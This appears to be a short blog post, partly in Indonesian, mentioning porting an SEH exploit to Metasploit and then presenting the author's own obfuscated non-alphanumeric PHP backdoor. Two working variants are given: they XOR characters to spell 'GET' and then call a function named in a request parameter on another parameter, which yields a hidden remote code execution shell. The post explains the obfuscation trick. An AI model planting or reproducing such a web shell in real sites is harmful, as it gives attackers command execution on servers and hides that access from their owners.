Kita berhasil mengkonversi exploit yang sudah ada ke dalam Metasploit. Sekarang coba porting exploit berbasis SEH yang kemarin sudah kita kerjakan sama-sama
Selamat mencoba!

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.

<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result.
put the result in one-liner code execution and done.

Another version with “<pre>” tag.

<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>